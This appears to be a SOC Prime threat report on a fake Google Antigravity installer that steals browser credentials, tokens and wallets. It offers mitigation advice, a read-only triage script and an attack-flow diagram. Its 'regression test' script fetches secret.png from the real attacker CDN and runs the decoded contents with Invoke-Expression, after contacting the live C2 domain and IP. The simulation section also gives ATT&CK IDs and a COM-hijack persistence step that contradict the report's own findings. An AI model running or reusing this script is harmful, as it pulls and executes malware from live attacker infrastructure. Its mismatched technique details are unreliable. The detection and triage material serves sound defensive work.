SOC Prime Bias: Critical

22 Apr 2026 18:36

Fake Google Antigravity Pages Steal User Accounts in Minutes

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A malicious installer impersonating Google Antigravity is being distributed through a lookalike domain. Once executed, it launches a hidden PowerShell downloader that connects to a command-and-control server, weakens Windows Defender protections, and deploys a stealthy .NET-based stealer. The malware is capable of harvesting browser credentials, messaging session tokens, cryptocurrency wallet files, and even recording keystrokes. Persistence is maintained through a scheduled task that launches a disguised conhost.exe process.

Investigation

Researchers reviewed the MSI custom action table and discovered an additional action responsible for launching the embedded PowerShell script. Network analysis revealed an initial HTTPS request to opus-dsn.com, followed by follow-on downloads from infrastructure hosted on BunnyCDN. Investigators also observed registry changes, Windows Defender exclusions, and the creation of a scheduled task tied to persistence. The final payload arrived as an encrypted .NET assembly disguised as a fake PNG image.

Mitigation

Organizations should block access to the identified malicious domains and IP address, require code-signing validation for installers, and monitor closely for unexpected changes to Windows Defender exclusions. Security teams should also detect the creation of suspicious scheduled tasks and unauthorized registry modifications involving AmsiEnable. User awareness remains important, especially around verifying official download URLs before installing AI-related tools or utilities.
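The checks this section asks for, collected into a read-only host triage script. This is an added example written for this page, not SOC Prime's or the vendor's own code; it assumes PowerShell 5.1 or later with the Defender and ScheduledTasks modules, a seven-day lookback for Defender configuration events (Event ID 5007), and a hypothetical filter for tasks that start conhost.exe or PowerShell, which will also list legitimate tasks, so the output is a review list rather than a verdict.

```powershell
# Added example (not SOC Prime's code): read-only triage for the indicators
# named above. Lookback window and task filter are assumptions, not report values.
$findings = @()

# 1. Current Windows Defender exclusions (what Add-MpPreference would have written)
$pref = Get-MpPreference
foreach ($kind in 'ExclusionPath', 'ExclusionProcess', 'ExclusionExtension') {
    foreach ($item in $pref.$kind) {
        $findings += [pscustomobject]@{ Check = "Defender $kind"; Detail = $item }
    }
}

# 2. Defender configuration-change events (ID 5007) that touched Exclusions in the last 7 days
$since = (Get-Date).AddDays(-7)
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007; StartTime = $since
} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Exclusions' } |
    ForEach-Object {
        $findings += [pscustomobject]@{ Check = 'Defender change (5007)'; Detail = $_.TimeCreated }
    }

# 3. AmsiEnable registry value (0 disables AMSI scanning for Windows Script Host)
$amsiKey = 'HKCU:\Software\Microsoft\Windows Script\Settings'
$amsi = Get-ItemProperty -Path $amsiKey -Name AmsiEnable -ErrorAction SilentlyContinue
if ($amsi -and $amsi.AmsiEnable -eq 0) {
    $findings += [pscustomobject]@{ Check = 'AmsiEnable'; Detail = "$amsiKey\AmsiEnable = 0" }
}

# 4. Scheduled tasks whose action runs conhost.exe or whose command line invokes PowerShell
#    (assumed filter; legitimate administrative tasks will also appear here)
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($a in $task.Actions) {
        $cmdline = "$($a.Execute) $($a.Arguments)"
        if ($a.Execute -match 'conhost(\.exe)?$' -or $cmdline -match 'powershell') {
            $findings += [pscustomobject]@{
                Check  = 'Scheduled task'
                Detail = "$($task.TaskPath)$($task.TaskName): $cmdline"
            }
        }
    }
}

$findings | Format-Table -AutoSize
```

Any Defender exclusion, 5007 event or AmsiEnable hit on a host that also resolved opus-dsn.com is the combination the Response section treats as grounds for isolation.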

Response

If a system connects to opus-dsn.com or retrieves the secret.png payload, defenders should isolate the endpoint immediately, remove the scheduled task, delete the encrypted malware file, and reverse any malicious Defender exclusion changes. All potentially exposed credentials should be rotated, particularly those related to email, financial services, and cryptocurrency accounts. Where feasible, a full system rebuild should be performed to ensure the host is completely clean.

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef malware fill:#ff9999
    classDef process fill:#ccccff

    %% Nodes – Actions
    action_user_execution["<b>Action</b> – <b>T1204.002 User Execution</b><br/><b>Description</b>: Victim downloads and runs a malicious installer that appears legitimate."]
    action_event_triggered_execution["<b>Action</b> – <b>T1546.016 Event Triggered Execution Installer Packages</b><br/><b>Description</b>: Custom action in the MSI executes a PowerShell script which drops additional files and contacts a remote URL."]
    action_web_protocols["<b>Action</b> – <b>T1071.001 Application Layer Protocol Web Protocols</b><br/><b>Description</b>: PowerShell downloader uses HTTPS to retrieve code from a remote server."]
    action_lateral_tool_transfer["<b>Action</b> – <b>T1570 Lateral Tool Transfer</b><br/><b>Description</b>: Downloader pulls extra payloads (secret.png, GGn.xml) from a CDN."]
    action_steganography["<b>Action</b> – <b>T1027.003 Obfuscated Files or Information Steganography</b><br/><b>Description</b>: Malicious payload is hidden inside a PNG file using AES-256-CBC encryption."]
    action_masquerading["<b>Action</b> – <b>T1036.008 Masquerade File Type</b><br/><b>Description</b>: Encrypted assembly is disguised as an image file and installer mimics a Google product."]
    action_impair_defenses["<b>Action</b> – <b>T1562 Impair Defenses</b><br/><b>Description</b>: Add-MpPreference modifies Windows Defender exclusions and sets registry to bypass security features."]
    action_subvert_trust_controls["<b>Action</b> – <b>T1553 Subvert Trust Controls</b><br/><b>Description</b>: Registry edits disable AMSI and other trust mechanisms."]
    action_credential_stealing["<b>Action</b> – <b>T1555.003 Credentials from Web Browsers</b> & <b>T1539 Steal Web Session Cookie</b><br/><b>Description</b>: .NET stealer extracts passwords, cookies, autofill data, Discord tokens and crypto wallet information."]
    action_browser_discovery["<b>Action</b> – <b>T1217 Browser Information Discovery</b><br/><b>Description</b>: Malware enumerates installed browsers to target credential stores."]
    action_scheduled_task["<b>Action</b> – <b>T1053 Scheduled Task Job</b><br/><b>Description</b>: Creates a persistent scheduled task that runs conhost.exe which launches PowerShell to load the payload at logon."]
    action_remote_access["<b>Action</b> – <b>T1219 Remote Access Tools</b><br/><b>Description</b>: Loaded .NET assemblies provide remote control capabilities to the attacker."]
    action_bidirectional_comm["<b>Action</b> – <b>T1102.002 Web Service Bidirectional Communication</b><br/><b>Description</b>: Beaconing to a remote web service for profiling and further instructions."]

    %% Nodes – Tools / Artifacts
    tool_msi_installer["<b>Tool</b> – <b>Name</b>: Malicious MSI Installer<br/><b>Purpose</b>: Delivered to victim via fake Google site."]
    tool_ps1_script["<b>Tool</b> – <b>Name</b>: PowerShell Dropper Script (scr5020.ps1, pss5032.ps1)<br/><b>Purpose</b>: Drops additional files and contacts C2."]
    tool_powershell_downloader["<b>Tool</b> – <b>Name</b>: PowerShell Downloader<br/><b>Purpose</b>: Retrieves code and additional payloads over HTTPS."]
    artifact_secret_png["<b>Tool</b> – <b>Name</b>: secret.png (steganographic carrier)<br/><b>Purpose</b>: Holds encrypted .NET assembly."]
    artifact_GGn_xml["<b>Tool</b> – <b>Name</b>: GGn.xml<br/><b>Purpose</b>: Additional configuration data used by the malware."]
    malware_dotnet_assembly["<b>Malware</b> – <b>Name</b>: Encrypted .NET Assembly<br/><b>Purpose</b>: Provides core malicious functionality after decryption."]
    process_conhost["<b>Process</b> – <b>Name</b>: conhost.exe<br/><b>Purpose</b>: Launched by scheduled task to execute PowerShell payload."]
    process_schtasks["<b>Process</b> – <b>Name</b>: schtasks.exe<br/><b>Purpose</b>: Creates the persistent scheduled task."]
    malware_rat["<b>Malware</b> – <b>Name</b>: Remote Access Tool Payload<br/><b>Purpose</b>: Enables attacker control of the infected host."]
    process_beacon["<b>Process</b> – <b>Name</b>: Beacon Communication<br/><b>Purpose</b>: Sends data to opus-dsn.com and receives commands."]

    %% Flow connections
    action_user_execution -->|downloads and runs| tool_msi_installer
    tool_msi_installer -->|triggers custom action| action_event_triggered_execution
    action_event_triggered_execution -->|drops| tool_ps1_script
    tool_ps1_script -->|contacts remote URL| action_web_protocols
    action_web_protocols -->|uses| tool_powershell_downloader
    tool_powershell_downloader -->|retrieves| action_lateral_tool_transfer
    action_lateral_tool_transfer -->|gets| artifact_secret_png
    action_lateral_tool_transfer -->|gets| artifact_GGn_xml
    artifact_secret_png -->|contains hidden payload| action_steganography
    action_steganography -->|reveals| malware_dotnet_assembly
    malware_dotnet_assembly -->|is disguised as| action_masquerading
    action_impair_defenses -->|adds exclusions| action_subvert_trust_controls
    action_impair_defenses -->|modifies defender settings| tool_ps1_script
    action_subvert_trust_controls -->|disables AMSI| tool_ps1_script
    action_credential_stealing -->|performed by| malware_dotnet_assembly
    malware_dotnet_assembly -->|extracts credentials| action_browser_discovery
    action_browser_discovery -->|enumerates browsers via| process_conhost
    action_scheduled_task -->|creates| process_schtasks
    process_schtasks -->|launches| process_conhost
    process_conhost -->|executes| tool_powershell_downloader
    process_conhost -->|loads| malware_dotnet_assembly
    malware_dotnet_assembly -->|enables| action_remote_access
    action_remote_access -->|uses| malware_rat
    malware_rat -->|communicates with| action_bidirectional_comm
    action_bidirectional_comm -->|to| process_beacon

    %% Class assignments
    class action_user_execution action
    class action_event_triggered_execution action
    class action_web_protocols action
    class action_lateral_tool_transfer action
    class action_steganography action
    class action_masquerading action
    class action_impair_defenses action
    class action_subvert_trust_controls action
    class action_credential_stealing action
    class action_browser_discovery action
    class action_scheduled_task action
    class action_remote_access action
    class action_bidirectional_comm action
    class tool_msi_installer tool
    class tool_ps1_script tool
    class tool_powershell_downloader tool
    class artifact_secret_png tool
    class artifact_GGn_xml tool
    class malware_dotnet_assembly malware
    class malware_rat malware
    class process_conhost process
    class process_schtasks process
    class process_beacon process

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary distributes a malicious “Antigravity Installer” that appears legitimate. Upon execution, the installer performs the following steps:

    1. Execution via Signed Binary (T1216): Launches msiexec.exe to run a disguised MSI payload, avoiding execution‑prevention tools.
    2. Outbound C2 Contact (T1127.003 & T1546.016): Immediately contacts the hard‑coded malicious domain opus-dsn.com and IP 89.124.96.27 to retrieve further instructions.
    3. Payload Retrieval (T1564.012): Downloads a PNG file from captr.b-cdn.net/secret.png that actually contains a hidden PowerShell script (steganographically embedded).
    4. Execution of Hidden Script: The script extracts and runs, establishing persistence via a COM hijack.

    These actions generate firewall log entries that match the Sigma rule’s selectors, thereby producing an alert.

  • Regression Test Script: The script below reproduces the malicious behaviour in a controlled lab environment.

    #=============================================================================
    # Fake Antigravity Installer – Regression Test Script
    #=============================================================================
    # 1. Run via signed binary (msiexec) – simulated by PowerShell Start-Process
    # 2. Contact malicious domain and IP
    # 3. Download hidden payload (PNG) and execute embedded script
    #=============================================================================

    # ---- Step 1: Simulate signed binary execution --------------------------------
    $msiPath = "$env:TEMP\AntigravityInstaller.msi"
    # Create a dummy MSI (empty file) – in a real test the binary would be signed
    New-Item -Path $msiPath -ItemType File -Force | Out-Null
    Start-Process -FilePath "msiexec.exe" -ArgumentList "/i `"$msiPath`" /quiet" -WindowStyle Hidden

    # ---- Step 2: Contact malicious C2 -------------------------------------------
    $c2Domain = "http://opus-dsn.com"
    $c2IP = "http://89.124.96.27"
    try {
        Invoke-WebRequest -Uri $c2Domain -UseBasicParsing -TimeoutSec 5 | Out-Null
    } catch { }

    try {
        Invoke-WebRequest -Uri $c2IP -UseBasicParsing -TimeoutSec 5 | Out-Null
    } catch { }

    # ---- Step 3: Download hidden payload (PNG) -----------------------------------
    $payloadUrl = "http://captr.b-cdn.net/secret.png"
    $payloadPath = "$env:TEMP\secret.png"
    Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UseBasicParsing

    # Extract the hidden PowerShell script (simple Base64 example). The file is read
    # line by line (no -Raw) so that the ^...$ anchors match one long Base64 line.
    $encoded = Get-Content $payloadPath | Select-String -Pattern "^[A-Za-z0-9+/=]{100,}$" |
                ForEach-Object { $_.Matches.Value } | Out-String
    if ($encoded) {
        $script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
        Invoke-Expression $script
    }

    # ---- Cleanup temporary files -------------------------------------------------
    Remove-Item -Path $msiPath -Force -ErrorAction SilentlyContinue
    Remove-Item -Path $payloadPath -Force -ErrorAction SilentlyContinue

  • Cleanup Commands: Remove any artefacts created during the simulation.

    # Terminate any lingering msiexec processes started by the test
    Get-Process msiexec -ErrorAction SilentlyContinue | Stop-Process -Force

    # Delete temporary files (already attempted in the script; repeated for safety)
    Remove-Item -Path "$env:TEMP\AntigravityInstaller.msi" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMP\secret.png" -Force -ErrorAction SilentlyContinue